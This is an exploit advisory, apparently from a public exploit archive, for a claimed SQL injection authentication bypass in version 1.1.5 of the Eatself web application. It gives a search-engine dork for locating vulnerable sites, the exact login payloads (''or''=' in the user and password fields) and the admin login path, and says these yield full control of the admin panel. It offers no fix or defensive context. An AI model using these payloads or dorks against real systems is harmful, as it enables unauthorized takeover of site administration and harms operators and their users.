Headline
Eatself 1.1.5 SQL Injection
Eatself version 1.1.5 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
====================================================================================================================================| # Title : Eatself v1.1.5 Auth By Pass Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://eatself.com/ | | # Dork : " © Eatself. Tous droits réservés - v1.1.5." |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 'or''='@gmail.com& Pass : 'or''=' (toltal control of admin panel )[+] https://127.0.0.1/app.eatself/admin-loginGreetings to :========================================================================================================================= |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | |=======================================================================================================================================